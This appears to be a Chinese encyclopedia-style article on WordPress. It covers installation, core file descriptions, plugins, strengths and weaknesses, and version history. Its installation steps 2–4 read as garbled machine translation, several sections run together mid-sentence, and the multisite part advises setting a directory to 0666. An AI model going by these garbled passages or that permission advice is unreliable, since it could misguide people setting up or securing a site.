WordPress的开发者团体中,测试者也对开发做出了一定的贡献。他们无偿地付出时间和辛劳来测试每一个版本。他们可以把发现的错误和问题提交到邮件列表,也可以提交到 WordPress 项目的Trac平台上。这个平台方便开发者们管理源代码和报告bug,从而使得众多 WordPress 爱好者们都能参与到它的开发中。下载安装第1步:下载并提取安装包
下载并解压缩WordPress的安装包
将WordPress上传到远程服务器时,首先需要在浏览器中将WordPress安装包下载到本地机器,然后解压。
如果用shell进入web服务器且熟练掌握基于控制台的工具,而又不想用FTP,可以用wget(或lynx或其它基于控制台的web浏览器)将WordPress直接下载到web服务器上:1、wget 可以去官网下载;2、然后用tar -xzvf latest.tar.gz 解压安装包
WordPress安装包会被解压到一个名为wordpress的文件夹中,该文件夹与latest.tar.gz在同一目录下。
如果不能用shell来访问web服务器,也不习惯使用基于控制台的工具,还可以用 ZipDeploy将WordPress直接下载到web服务器上
[WordPress] WordPress
第2步:创建数据库和用户
如果使用的是托管服务提供商,可能已经拥有了WordPress的数据库,建立了,或可能有一个自动安装的解决办法这样做。检查托管服务提供商的支持网页或控制面板为线索,不论需要创建一个手动。
如果确定,需要创建一个手动,请按照指示进入phpMyAdmin的各种服务器,或按照指示使用的cPanel或使用phpMyAdmin如下。
如果正在安装WordPress的自己的网络服务器,按照使用phpMyAdmin或使用MySQL客户端下面的说明来建立WordPress的用户名和数据库。
如果只有一个数据库,它已在使用中,可以安装WordPress的中-只要确定有其特殊的前缀为表格,避免过度书面任何现有的数据库表。
第3步:设置 config.php
在接下来的部分,代码将期待变化如下:
界定/ /更改为一个独特的词组。
回到WordPress的提取包中第1步,重命名该文件配置sample.php以, config.php。
打开改名, config.php文件中最喜爱的文本编辑器,并填写下列资料,按上面的范例:
DB_NAME
资料库名称建立在WordPress的第2步。
DB_USER
用户名创建的WordPress的在第2步。
DB_PASSWORD
密码选择的WordPress的用户名在第2步。
DB_HOST
主机名称确定第2步(通常是本地主机,但并不总是。见一些可能DB_HOST值)。
DB_CHARSET
该数据库的字符集,通常不应改变。见编辑, config.php的细节。
DB_COLLATE
该数据库的排序一般应留空。见编辑, config.php的细节。
保存该文件。
为更广泛的细节,一步一步指示建立的配置文件,是指编辑, config.php。
如需关于启用SSL在WordPress的2.6 ,看到的SSL和Cookies在WordPress的2.6。
第4步:上传的文件
将需要决定在哪里在网站上想要博客显示:
在根目录中的网站。
子目录中的网站上。
注:位置的根网页目录中的文件在Web服务器上不同的托管服务提供商和操作系统。请与托管服务提供商或系统管理员,如果不知道在哪里,这是。
在根目录
如果需要将文件上传到Web服务器,使用最喜爱的FTP客户端上传的所有内容WordPress的目录(但不包括目录本身)的根目录网站。
如果档案已经在Web服务器,以及正在使用shell进入安装WordPress的,将所有的内容WordPress的目录(但不包括目录本身)的根目录网站。
子目录
如果需要将文件上传到Web服务器,请重新命名WordPress的目录,想要的名称,然后使用最喜爱的FTP客户端上传目录,想要的位置的根目录网站。
第五步:设置固定链接(伪静态)
WordPress 固定链接结构标签:
%year%:表示“年”, 格式:2004
%monthnum%:表示“月”,格式:05
%day%:表示“日”,格式:28
%hour%:表示“时”,格式:15
%minute%:表示“分”,格式:43
%second%:表示“秒”,格式:33
%postname%:表示“文章名”,如文章标题是“boke8 very good,博客吧,非常好”,那么永久链接就会显示“boke8-very-good-博客吧,非常好”,其中的中文可以在添加文章时编辑为英文或数字等。
%post_id%:表示文章的ID,格式:423
%category%:表示“分类”,格式:例如分类别名为“wordpress博客”,那么永久链接就会出现“WordPress博客”,显示的是分类名称的别名,不想显示中文,可以编辑分类名称的别名为英文或拼音等。
%tag%:表示“标签”,不用说,参考“分类”
%author%:表示“作者”,显示的是作者的昵称,格式参考“分类”
设置固定链接方法:
登陆博客后台,进入设置菜单下的固定链接,选择“自定义结构”,然后在后面的输入框里输入自己的组合,
格式可以是:
/标签/ 实例:/%postname%/
/标签/标签/标签 实例:/%category%/%author%/%postname%
/标签/标签.html实例:/%author%/%postname%.html
……
用多少个标签组合根据自己的喜好,但加标签前面记得要加”/”。如果喜欢博客吧的URL形式,可以后标签后面加后缀,如.html或其它的。
博客吧的固定链接:
/%postname%.html” ,然后显示的地址形式为http://域名/文章名.html
其它例子,可以在配置链接里参考:日期和文章名、月份和文章名、数字,把相关的对照一下标签即可。
如果需要设置自定义的固定链接,需要对web服务器的设置进行修改,以NGINX为例,需要在web服务器的配置文件增加以下几句:
location / {
try_files $uri $uri/ /index.php?q=$uri&$args;
}
第六步:PING列表设置
的作用是为了增加搜索引擎收录
PING设置:
登陆博客后台,进入设置菜单下的撰写,选择“更新服务”,然后在后面的输入框里输入PING列表地址目录文根目录
1.index.php:wordpress核心索引文件,即博客输出文件。
2.license.txt:WordPress GPL许可证文件。
3.my-hacks.php:定义了博客输出之前处理的追加程序。默认安装中并没有这个文件,但如果存在,它就会被管理页面引用。
4.readme.html:WordPress安装导言。
5.wp-atom.php:输出Atom信息聚合内容。
⒍wp-blog-header.php:根据博客参数定义博客页面显示内容。
7.wp-cron.php
8.wp-comments-post.php:接收评论,并把其添加到数据库。
9.wp-commentsrss2.php:用来生成日志评论的RSS2信息聚合内容。
10.wp-config-sample.php:把WordPress连接到MySQL数据库的示例配置文件。
11.wp-config.php:这是真正把WordPress连接到MySQL数据库的配置文件。默认安装中虽不包括它,但由于WordPress运行需要这一文件,因此,用户需要编辑这个文件以更改相关设置。
12.wp-feed.php:根据请求定义feed类型并其返回feed请求文件。
13.wp-links-opml.php:生成OPML格式的链接(通过WordPress管理菜单添加)列表。
14.wp-login.php:定义注册用户的登陆页面。
15.wp-mail.php:用来获取通过邮件提交的博文。这个文件的URL通常被添加到cron任务中,这样cron就会定期检索文件并接收邮件日志。
16.wp-pass.php:审核受密码保护文章的密码并显示被保护文章。
17.wp-rdf.php:生成RDF信息聚合内容。
18.wp-register.php:允许新用户通过联机表单注册用户名。
19.wp-rss.php:生成RSS信息聚合内容。
20.wp-rss2.php:生成RSS2信息聚合内容。
21.wp-settings.php:运行执行前的例行程序,包括检查安装是否正确,使用辅助函数,应用用户插件,初始化执行计时器等等。
22.wp-trackback.php:处理trackback请求。
23.wp.php:显示博客日志的简单模板。并没有什么神奇之处,但包括了部分index.php内容。
24.xmlrpc.php:处理xmlrpc请求。用户无需通过内置的网络管理界面就可发布文章。
wp-adminwp-admin/admin.php:管理文件的核心文件。用来连接数据库,整合动态菜单数据,显示非核心控制页面等。2.wp-admin/admin-db.php
3.wp-admin/admin-footer.php:定义所有管理控制台的页脚。
4.wp-admin/admin-functions.php:定义了管理控制台使用的多种函数。5.wp-admin/admin- header.php:定义了管理控制台的上半部分内容,包括菜单逻辑 (menu logic)的 menu-header.php文件。
6.wp-admin/bookmarklet.php:使用书签功能时,定义弹出页面。撰写日志时使用默认的edit-form.php文件。
7.wp-admin/categories.php:定义管理页面的类别管理。参考:Manage – Categories
8.wp-admin/cat-js.php
9.wp-admin/edit.php:定义管理页面的日志管理。参考:Manage – Posts
10.wp-admin/edit-comments.php:定义管理页面的评论管理。参考:Manage – Comments
11.wp-admin/edit-form-advanced.php:定义管理页面的日志高级编辑形式管理,包括post.php。参考:Write – Write Post – Advanced
12.wp-admin/edit-form.php:定义管理页面的日志简单编辑形式管理,包括post.php。参考:Write – Write Post
13.wp-admin/edit-form-comment.php:编辑特定日志评论。
14.wp-admin/edit-form-ajax-cat.php
15.wp-admin/edit-link-form.php
16.wp-admin/edit-page-form.php:定义管理模块页面的页面编辑,包括post.php和page-new.php。参考:Write – Write Page
17.wp-admin/edit-pages.php:定义管理模块页面的页面管理。参考:Manage – Pages
18.wp-admin/execute-pings.php
19.wp-admin/import.php
20.wp-admin/index.php:默认管理页面。根据用户请求显示相应的页面。
21.wp-admin/inline-uploading.php
22.wp-admin/install-helper.php:定义数据库维护函数,包括popular-in-plugins maybe_create_table() 和maybe_add_column()。
23.wp-admin/install.php:安装WordPress。
24.wp-admin/link-add.php:链接添加。参考:Links – Add Link
25.wp-admin/link-categories.php:链接分类管理。参考:Links – Link Categories
26.wp-admin/link-import.php:导入链接。参考:Links – Import Links
27.wp-admin/link-manager.php:链接管理。参考:Links – Manage Links
28.wp-admin/link-parse-opml.php:导入链接时,用来解析OPML文件。
29.wp-admin/list-manipulation.js
30.wp-admin/list-manipulation.php
31.wp-admin/menu-header.php:用于在管理界面显示菜单。wp-admin/menu.php:定义了默认管理菜单结构。33.wp-admin/moderation.php:定义了评论审核函数。
34.wp-admin/options.php:升级后,用来更改所有设置。
35.wp-admin/options-discussion.php:管理评论和trackback相关选项。参考:Options – Discussion
36.wp-admin/options-general.php:管理基本配置选项。参考:Options – General
37.wp-admin/options-head.php
38.wp-admin/options-misc.php:设置文件上传,链接跟踪,自定义”hacks”等相关选项。参考:Options – Miscellaneous
39.wp-admin/options-permalink.php:管理永久链接选项。参考:Options – Permalinks
40.wp-admin/options-reading.php:设置如何把网站信息发送到读者浏览器或其它应用程序。参考:Options – Reading
41.wp-admin/options-writing.php:管理日志撰写界面。参考:Options – Writing
42.wp-admin/page-new.php:创建新页面。
43.wp-admin/plugin-editor.php:编辑插件文件。
44.wp-admin/plugins.php:管理插件。
45.wp-admin/post.php:创建新日志。
46.wp-admin/profile-update.php
47.wp-admin/profile.php:管理个人资料或配置。
48.wp-admin/setup-config.php:安装时,用来创建wp-config.php文件。
49.wp-admin/sidebar.php
50.wp-admin/templates.php:编辑服务器可写文件。
51.wp-admin/theme-editor.php:编辑特定主题中的文件。
52.wp-admin/themes.php:管理主题。
53.wp-admin/update-links.php
54.wp-admin/upgrade-functions.php:定义了版本升级函数。
55.wp-admin/upgrade-schema.php:定义了升级中使用的默认表格结构和选项。
56.wp-admin/upgrade.php:版本升级。
57.wp-admin/user-edit.php:编辑用户。
58.wp-admin/users.php:管理用户。
59.wp-admin/wp-admin.css:定义了管理控制台的默认样式表。
60.wp-admin/xfn.js
wp-includes
1.wp-includes/cache.php
2.wp-includes/capabilities.php
3.wp-includes/class-ⅨR.php:IncutioXML-RPC库。包括了 XML RPC支持函数。
4.wp-includes/classes.php:包括了基本的类,如核心文章提取机制WP_Query和改写管理WP_Rewrite。
5.wp-includes/class-pop3.php:包括了支持使用POP邮箱的类。可供wp-mail.php使用。
6.wp-includes/class-snoopy.php:Snoopy是一个PHP类,用来模仿Web浏览器的功能,它能自动完成检索网页和发送表单的任务。
7.wp-includes/comment-functions.php
8.wp-includes/default-filters.php
9.wp-includes/feed-functions.php
10.wp-includes/functions-compat.php:即新版本PHP中用来支持老版本PHP的函数文件。
11.wp-includes/functions-formatting.php:用于清理XHTML和用特定字符集正确格式化文本。
12.wp-includes/functions-post.php:定义了在数据库中管理日志,查询用户权限,提取和撰写评论等函数。
13.wp-includes/functions.php:包含许多重要的支持函数,它是WordPress中最大的文件,函数数量几乎是第二大文件的两倍。
14.wp-includes/gettext.php:PHP-gettext GPL 翻译库组成部分。
15.wp-includes/kses.php:用来渲染和过滤日志或评论中的HTML。
16.wp-includes/links.php:用来管理和使用WordPress的链接功能。
17.wp-includes/locale.php:用来替代默认的星期和月份值。
18.wp-includes/pluggable-functions.php
19.wp-includes/registration-functions.php
⒛wp-includes/rss-functions.php
21.wp-includes/streams.php:定义了包装文件流和字符流的类。
22.wp-includes/template-functions-author.php:包含了与日志作者或评论人相关的主题函数。
23.wp-includes/template-functions-category.php:包含了与类别相关的主题函数。
24.wp-includes/template-functions-comment.php:包含了与评论相关的主题函数。
25.wp-includes/template-functions-general.php:包含了常规主题函数。
26.wp-includes/template-functions-links.php:包含了与链接相关的主题函数。
27.wp-includes/template-functions-post.php:包含了与日志相关的主题函数。
28.wp-includes/template-functions.php:包含了以上所有”template-”文件。
29.wp-includes/template-loader.php
30.wp-includes/vars.php:用来设置杂项变量。
31.wp-includes/version.php:用来设置当前使用的WordPress版本。
32.wp-includes/wp-db.php:包含了用来连接MySQL数据库的函数。
33.wp-includes/wp-l10n.php:提供支持多语言版本的函数。多用户2006年10月23日,WordPress开发组正式发布WordPress多用户版──WordPress MU。
WordPress本身提供了多作者的功能,而WordPress MU则用来搭建BSP(Blog Service Provider)网站,可以构建多用户站点或为用户提供建站(建博客)服务,让每一个用户都可以创建一个或多个独立的Blog。
WordPress MU已经被集成进WordPress之中,成为WordPress 3.0的一部分。不过这个功能在WordPress 3.0中默认是关闭的,必须要在“wp-config.php”中打开方能使用。此外,WordPress MU对服务器及技术要求都比WordPress要高,有时一些主题模板、插件都未必能够运行。一般共享主机都会有所限制。升级在推出3.0版本的不到三个月时间里,iOS版WordPress就进行了重大更新。WordPress 3.0于5月份发布,提供了推送功能和评论工具栏,但是新发布的3.1版则是一个重大改革。
[iOS版WordPress3.1版] iOS版WordPress3.1版
新版本中用户界面更具新引力,采用了全新的UI设计。此外,新版本中还增加了滑动侧边栏功能,用于快速导航,而且添加了新的颜色和图形。
iPhone手机用户上的WordPress用户界面有一个隐藏的侧菜单,通过屏幕左上角的按钮可以访问,类似于Facebook应用程序。在iPad上则看起来更像是iPad版的Twitter。
新版本的重大更新还包括注册页面和应用程序图标的改进,以及一个全新的WordPress好友搜索功能,可以帮助你找到WordPress博客上的朋友。另外该应用程序中在横向模式下也可以使用,而且访问自己的博客和应用程序内部的仪表板更加便捷。
此次iOS版WordPress 3.1专为iPad用户提供了一些新功能,如WordPress阅读器,以及图片快速上传功能。兼容性该应用程序可以在App Store上免费下载,可兼容iOS 4.0或更高版本。8安全设置编辑
升级WordPress程序版本
隐藏WordPress程序版本
更改WordPress用户名
更改WordPress用户密码
防止WordPress目录显示
保护wp-admin文件夹
针对搜索引擎进行屏蔽保护
安装Login Lockdown插件
WordPress数据库安全
WordPress安全扫描
对wordpress所有空间进行安全漏洞检查WordPress 3.6 Beta1
WordPress发布了3.6的首个Beta测试版本,3.6将包含如下几个方面的改进:
Post Formats: 可以单独给每篇文章设置不同主题,主题作者可访问模板函数和结构化数据
Twenty Thirteen: 全新主题,色彩丰富,侧重博客
Audio/Video: 你可嵌入音频和视频到文章,无需通过插件或者第三方媒体托管服务
Autosave: 文章可自动在本地保存,如果你的浏览器崩溃或者计算机宕机或者服务器掉线都不会丢失数据
Post Locking: 当某人正在编辑文章时,锁定文章不让看
Nav Menus: 导航菜单进行简化,使用卷帘式UI和独立的Tab
Revisions: 全新的界面功能的修改头像,通过滑块从历史记录中选择并提供两栏的范围比较
主要功能包括:
文章格式:
主题搜索:
内部链接:
管理工具拦:
交互式管理;
更新内置编辑器;
多分类查询;
自定义文章类型索引页;
清理后台CSS;
用户管理;
网络管理;
密码重置归来。
WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。
WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的。用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。
WordPress有许多第三方开发的免费模板,安装方式简单易用。不过要做一个自己的模板,则需要你有一定的专业知识。比如你至少要懂的标准通用标记语言下的一个应用HTML代码、CSS、PHP等相关知识。
WordPress官方支持中文版,同时有爱好者开发的第三方中文语言包,如wopus中文语言包。WordPress拥有成千上万个各式插件和不计其数的主题模板样式。
1软件介绍编辑WordPress是一个免费的开源项目,在GNU通用公共许可证下授权发布。
2014年12月23日发布WordPress 4.1,发行代号“Dinah”。
WordPress被认为是Michel Valdrighi所开发的网志平台b2/cafelog的正式继承者。“WordPress”这个名字出自Christine Selleck的主意,他是主要开发者Matt Mullenweg的朋友。
WordPress 功能强大,插件众多,易于扩充功能。安装使用都非常方便。
WordPress 的原版是英文版的,UTF-8编码,2014年12月23日发布4.1版(详见wordpress官网)。2013 年 06月 22日的3.5.2版,其版本的别称是“Elvin”,献给鼓手 Elvin Jones 等。WordPress 3.5要求 PHP 版本至少为 5.2.4(不支持第三方推出的“PHP6.0”),mysql版本至少为5.0。为满足日益庞大的中文用户需求开辟了中文官方站点且提供中文版程序下载。还有爱好者开发了中文语言包,使其可以支持中文。不过,由于使用的编码原因,中文字符截断时会出现乱码。不过桑葚网友制作的中文 WordPress工具箱插件可以解决这个问题。
使用WordPress平台的发行商约占全球网站的10%。而WordPress官方网站的每月独立访问用户数则达到3亿。
从3.0开始,WordPress已经内置多用户博客的功能,可以通过简单的设置就开设一个支持多域名的博客平台。
WordPress 是世界上使用最广泛的博客系统,是一款开源的PHP软件。因为使用者众多,所以WordPress社区非常活跃,有丰富的插件模板资源。使用WordPress可以快速搭建独立的博客网站。
WordPress 不仅仅是一个博客程序,也是一个优秀的小型CMS,很多非博客网站也是用WordPress搭建的。2插件模板编辑WordPress 拥有
[WordPress] WordPress
世界上最强大的插件和模板,这也是WordPress非常流行的一个特性。当前WordPress插件数据库中有超过18000个插件,包括SEO、控件等等。个人可以根据它的核心程序提供的规则自己开发模板和插件。这些插件可以快速地把你的博客改变成cms、forums、门户等各种类型的站点。WordPress Theme 风格模板是世界上的程序里最多的,类型复杂,品质可嘉,样式繁多,只需要把不同的模板文件放到空间的Theme目录下就可以自由的在后台变幻,方便使用,而且不管你安装的的什么语言包,都可以自由的使用这些风格。只需要把插件文件上传到你 FTP 的 plugin 目录下,就可以直接在后台启用管理,甚至功能强大点的插件会有一个自己的管理目录在后台出现,就像程序自带似的方便,这些插件囊括了几乎所有互联网上可以实现的功能,比较著名的插件有:
你好多莉——好玩~--这不是普通的插件,它象征着一代人希望和热情,浓缩成 Louis Armstrong 的四个字:你好,多莉。在启用后,在您站点后台每个页面的右上角都可以看到一句来自《俏红娘》音乐剧的英文原版台词。
wp slug translate——很实用的一个插件,当你设置了按文章名字来自动填写固定链接的时候,它可以自动帮你翻译成英文,实在不能翻译也能自动转化成拼音。如果你写中文博客,这真的很有用,避免了乱码的出现!--set slug by translate title or slug from chinese to english with google translate or pinyin. 通过将title用google translate 翻译成英语或者拼音.
Link Manager——wordpress 3.5.1的链接呢?!没事,装了这个插件,立马就回来了!--Enables the Link Manager that existed in WordPress until version 3.5.
Most Popular Posts——按照评论的多少排列,显示热门文章!--Display a link to the most popular posts on your blog according to the number of comments.
MO Widgets——可以设置侧边栏在不同的页面显示不同的内容!--Useing it can easier to control your Widgets.Adds checkboxes to choose your Widget to show or hide on different pages;and add a Widget with support for including PHP.Thanks for Display widgets and Samsarin PHP Widget.|灵动边栏插件,使用它将使你更容易的控制你的边栏显示,安装激活以后会在小工具页面显示控制各个小工具在博客中任何页面是否显示,以实现不同页面不同侧边栏的效果;同时在小工具页面产生一个支持php语言的文本小工具,让你更容易的添加属于自己的边栏小工具.此插件在Display widgets和Samsarin PHP Widget基础上修改,在此感谢原作者.
WP No Category Base - WPML compatible——把文章分类的URL中的“category”去掉
GoogleXMLSitemaps——帮助你的网站更容易被google等搜索引擎收录!--This plugin will generate a special XML sitemap which will help search engines like baidu
值得注意的是,由于有些网站被qiang了,所以导致个别插件没法使用,因此就不再在这里一一列举了!3优缺点编辑
优点
WordPress 功能强大、扩展性强,这主要得益于其插件众多,易于扩充功能,基本上一个完整网站该有的功能,通过其第三方插件都能实现所有功能;
wordpress搭建的博客对seo搜索引擎友好,收录也快,排名靠前;
适合DIY,如果你是喜欢丰富内容的网站,那么wordpress可以很好地符合你的胃口。
主题很多,网站上一大片都是wordpress的主题,各色各样,应有尽有!
wordpress备份和网站转移比较方便,原站点使用站内工具导出后,使用WordPress Importer插件就能方便地将内容导入新网站。
wordpress有强大的社区支持,有上千万的开发者贡献和审查wordpress,所以wordpress是安全并且活跃的。
缺点
wordpress源码系统初始内容基本只是一个框架,需要时间自己搭建;
插件虽多,但是不能安装太多插件,否则会拖累网站速度和降低用户体验;
服务器空间选择自由较小!
静态化较差,确切地说是真正静态化做得不好,如果要想对整个网站生成真正静态化页面,还做不好,最多只能生成首页和文章页静态页面,所以只能对整站实现伪静态化!
wordpress的博客程序定位,简单的数据库层等都注定了他不能适应大数据。
4功能编辑
介绍[WordPress] WordPress
因为Wordpress强大的扩展性,很多网站已经开始使用Wordpress作为内容管理系统来架设商业网站。WordPress提供的功能包括:
1.文章发布、分类、归档、收藏,统计阅读次数。
2.提供文章、评论、分类等多种形式的RSS聚合。
3.提供链接的添加、归类功能。
4.支持评论的管理,垃圾信息过滤功能。
5.支持对样式CSS和PHP程序的直接编辑、修改。
6.在Blog系统外,方便的添加所需页面。
7.通过对各种参数进行设置,使Blog更具个性化。
8.在某些插件的支持下实现静态html页面生成(如WP-SUPER-CACHE)。
9.通过选择不同主题,方便地改变页面的显示效果。
10.通过添加插件,可提供多种特殊的功能。
11.支持Trackback和pingback。
12.支持针对某些其它blog软件、平台的导入功能。
13.支持会员注册登录,后台管理功能。特色所见即所得的文章编辑器
模板系统,也成为主题系统
[WordPress] WordPress
统一的链接管理功能
为搜索引擎而优化的永久链接(PermaLink)系统
支持使用扩充其功能的插件
对于文章可以进行嵌套的分类,同一文章也可属于多个分类
TrackBack和Pingback的功能
能产生适当的文字的格式和式样的排版滤镜
生成和使用静态页面的功能
多作者共同写作的功能
可以保存访问过网志的用户列表
可以禁止来自一定IP段的用户的访问
支持使用标签(Tags)5建站流程编辑1. 注册域名
一般注册.com域名就可以了,而且价格也不贵,基本上是70元一年。
2. 申请虚拟主机
虚拟主机运营商很多。国内主机速度快,但比较贵,而且空间一般比较小;国外主机便宜,且空间大多没有限制,但速度比国内主机慢。如何取舍就 看大家对于自己博客的定位了。如果只是用博客写写文章的话,推荐还是用国内的主机,如果是建论坛或者资源站点,经常需要上传附件的话,最好选用国外的不限空间的主机。
3. 在虚拟主机上绑定自己的域名
使用虚拟主机控制面板绑定申请的域名。
大多数虚拟主机绑定域名都很简单,实在不会的话,可以找虚拟主机的客服。
4. 下载WordPress程序
在WordPress中文官网上下载最新的WordPress程序。
5. 修改域名的DNS解析
为什么在浏览器上输入你的域名,就会显示你的主页呢。这就要靠DNS解析了。域名注册商都会提供一个域名管理系统,在里面可以修改自己域名的DNS 解析。将DNS解析到自己购买的虚拟主机上就可以了。虚拟主机的地址在虚拟主机提供商的控制面板上可以查看到,一般在绑定域名的页面会显示。
6. 创建WordPress数据库
国外的主机的有一好处是可以创建数据库。而国内主机一般要另行购买。
在控制面板中创建数据库,记下数据库的主机地址、数据库名称、用户名、密码,这四个要素。
7. 修改WordPress的安装配置文件。
就是修改wordpress程序包中的wp-config-sample.php文件,将第6步中记下的主机地址、数据库名称、用户名、密码填入相应的位置就可以了,并重命名为wp-config.php。
8. 上传WordPress程序至ixwebhosting主机域名空间
这步使用ftp上传就可以了。很简单。
9. 访问 域名/wp-admin/install.php进行wordpress安装。填写博客信息及邮箱。
这一步最轻松,完全傻瓜化,自动化。填邮箱的时候填第4步的域名邮箱比较好。当然也可以填自己的常用邮箱。
另,随着BAT云平台的推出,建站变得更加方便。比如,百度云平台已有相关教程。[2] 6版本介绍编辑
WordPress 2.7WordPress 2.7最大的不同来自后台界面的重新设计,更加合理的布局和更多方便的功能,比之 2.6 版本,2.7版本在宽屏上显示就漂亮许多了。
控制板组件化,可以随意组合,隐藏,显示组件,快速发布功能,线程化可分页评论,直接在控制板里回复评论,直接安装插件,还有一个不能不提到的:自动升级 WordPress 功能,以后你将不用再重复下载、解压、上传文件的步骤,WordPress会自动帮你完成。
WordPress 2.7 还有更多的细节和功能等你去发现,别忘了,升级前请先备份老系统。
升级WordPress 2.7前,请确认您是否已经备份过您修改过的文件,如 index.php。
从任何较早版本的 WordPress 升级到 2.7:备份您修改过的文件,并删除所有旧的 WordPress 文件。上传所有新文件。在浏览器中打开 /wp-admin/upgrade.php。升级完成。WordPress 2.82009年5月24日,WordPress官方推出了WordPress 2.8 beta2。
新版本最大的亮点就是主题的后台一键安装,WordPress官方设置了主题筛选的功能,可以根据 颜色、栏数、主题宽度、功能和博客类型进行主题的筛选,也可以查看最新上传的主题,当然,也可以根据标签和作者搜索主题。这些搜索功能是可以并用的,功能很强大。
2009年6月10日,WordPress正式释出2.8正式版。
2.8的代号为“Baker”,这个代号是为了向小号声乐家“Chet Baker”致敬而起的。
2009年7月10日,WordPress正式释出2.8.1正式版。
WordPress2.8.1正式版修正了许多BUG和增加了安全的插件管理页面。安全技术公司通知我们,管理网页添加某些插件可以被认为是无特权的用户,导致信息泄漏。并不是所有的插件很容易受到这个问题,但我们建议升级到2.8.1正式版
2009年8月12日,WordPress正式释出2.8.4正式版。又是安全更新,涉及到用户登录信息验证,建议尽快更新。其实更新就三个文件,用新版本的:wp-login.phpwp-includes/version.phpreadme.html覆盖2.8.3的文件即可。
WordPress 2.9 Beta 2
来自WordPress官方开发博客的消息,WordPress 2.9 Beta 2已经发布测试。相比WordPress 2.9Beta1,一共增加或修正了117个BUG,由于WordPress2.9的增加的主要功能已经确定,所以,这次更新主要是优化代码修复BUG,不涉及安全更新,也没有新功能更新。
Wopus整理了一份主要更新列表:大量更新、优化WordPress后台JS代码。优化后台插件编辑功能。优化后台页面CSS代码。优化Widgets代码和CSS。增强主题编辑功能,优化主题编辑CSS代码。优化内容编辑器。优化评论ajax效果,改进评论CSS代码。优化后台多媒体功能代码。
每次更新主要都是集中在wp-includes和wp-admin目录,有需要测试的朋友,可以直接到官方下载即可,也可以在Wopus首页右侧顶部下载。
WordPress 2.9.1
根据WordPress官方开发博客的消息,WordPress 2.9.1已经发布。WordPress 2.9.1是对上一版本的进一步优化。
WordPress 2.9.2
新版本修复关于回收站的一个多用户权限问题(这个安全漏洞非常严重可能会造成blog被非法入侵并修改文章类容)。其它的没有改变也没有性能上的提升。
WordPress 3.0正式版
WordPress 3.0正式版于2010年6月18日正式发布,新版本主要添加功能包括:
1.多站点功能(Multisite): WordPress和WordPressMU的整合。你可以使用WordPress创建多个网站了。
2.全新的WordPress默认主题 “Twenty Ten” 充分使用了WordPress 3.0的各种新增功能,如果你是一个开发人员,要熟悉3.0,那研究一下这个主题是很好 的入口。
3.自定义菜单管理功能:你可以在后混合页面、分类和自定义链接,创建一个或多个菜单。
4.自定义头部和背景的API: 开发人员可以少写很多代码了。
5.更友好的后台Help Tab:在WordPress后台,在不同页面点击help将显示更多的帮助信息,对于WP的新用户来说很实用。
6.在安装的时候可以选择用户和密码了。
7.可批量更新主题了。
8.对自定义文章类型(Custom posttypes) 和自定义分类系统Custom taxonomies 进行了改良。自定义分类系统从此版本开始支持层级关系了。
WordPress3.0新特性多站点功能(Multisite)开启设置:
原来wordpress3.0的多站点功能(Multisite)默认是没有开启的,需要手动修改设置,后台管理才会出现功能选项按钮。WordPress3.0新特性多站点功能(Multisite)开启设置方法:修改网站中的wp-config.php文件,在其末尾添加下列代码:define('WP_ALLOW_MULTISITE','true'); 修改之后,登陆后台管理页面,你将会发现,侧边栏“工具(Tools)”菜单下,将会多出一个“网络(Networks)”选项。
点击“网络(Networks)”选项,进入多站点设置,填写将要开启新站点的名称(Network Title)和管理员邮箱(Admin E-mail Address),并点击安装(install)。注意:开启之前,必须停用所有插件。安装之后,按照提示,需要在网站文件夹 wp-content 目录下创建一个名为blogs.dir 的文件夹,用来存储新开站点上传的多媒体文件,同时必须将 blogs.dir 文件夹的读写权限更改成0666 (-rw-rw-rw-)以确保该目录可写。
将弹出页面中的第二项中的代码,也就是按照提示复制到你的 wp-config.php中的 /* That’s all,stop editing! Happyblogging. */ 这段文字的上方。再将第三项中的代码复制到 .htaccess 文件中,覆盖其他 WordPress 规则,注意哦,这里是覆盖,也就是说原来的内容不需要了。上面的步骤就开启了WordPress3.0新特性多站点功能(Multisite),点击顶端的弹出框的“配置页面”,进入详细设置页面。
其他设置只要按要求填写就好了。但这里要注意“允许注册”这一项,如果你想要给用户开启多站点功能,那个站点创建是一定要的,就比如说最后一项“站点和用户帐户都可被创建”,这个选项就表示,用户可以注册帐号,并且可以在你的博客里注册新博客。
WordPress 3.0.1
本版本是在WordPress 3.0基础上的修正版,共修复前一个版本多达50个已出现的问题。而3.0以上版本针对2系列版本进行了大幅度修改包括:
WordPress 和 WordPress MU 已经合并,一个 WordPress 安装就能管理多个博客。(需要安DEMO装插件)
WordPress 3.0 新推出了 “Twenty Ten” 的默认主题,它包含了 WordPress 所有的功能。
新的菜单管理系统,可以让你创建包含由日志,页面,分类,标签和其他链接组成的完全自定义菜单。
自定义 header (头图)和背景颜色或者图片的 API。
WordPress 后台每个界面的帮助标签下都有上下文帮助。
全新安装的 WordPress 可以自定义帐号和密码。
在编辑主题的时候会自动进入维护模式。
支持短连接。
支持和改进了自定义日志类型和自定义分类系统。
一个更轻快颜色的后台,让你更加关注你的内容。
WordPress 3.0.5
核心程序方面,这是一个安全更新,重点针对站点中有不确定用户的情况;在 WordPress China 方面,我们特别为您准备了“中国视频网站视频自动嵌入功能”,您只需在文章中另起一段,复制优酷网、56或土豆网视频播放页面的网址,即可轻松插入视频。(详情请安装/升级后,访问“控制板 → 设置 → 中文本地化”,点击上方的“帮助”查看。)
详细情况如下:
修复了两个中等危险的安全问题。在以往版本中,贡献者和作者可以自我提权。
修复了一个信息泄露问题。以往版本中,作者级别的用户可以通过某种方法看到他们不应看到的内容。
做出了两个增强安全性的更改:一个是为那些没有正确使用安全 API 的插件提供的,另一个是对我们之 前发布的补丁进行更深层的修正。WordPress 3.1此版本引入了
1)全新设计的链接方式—— 今后您可以以闪电般的速度将文字链接到站点中的其它文章或页面;
2)添加了“管理工具条”功能,使用常用功能将只需点击一次鼠标;
3)简洁的流程化写作界面默认隐藏了极少用到的功能(在“页面选项”中可恢复它们);
4)3.1 版本还提供了新的后台蓝色配色方案。
开发者也有糖吃 ——“文章形式”功能让开发者为主题设计“微博”文章格式更加顺手;
新内容管理系统(CMS)功能提供了用来显示自定义文章类型的归档页面支持;
此版本还包含了全新的“网络管理员”、导入和导出系统的改造、分类法高级查询等功能。
WordPress 3.1.1
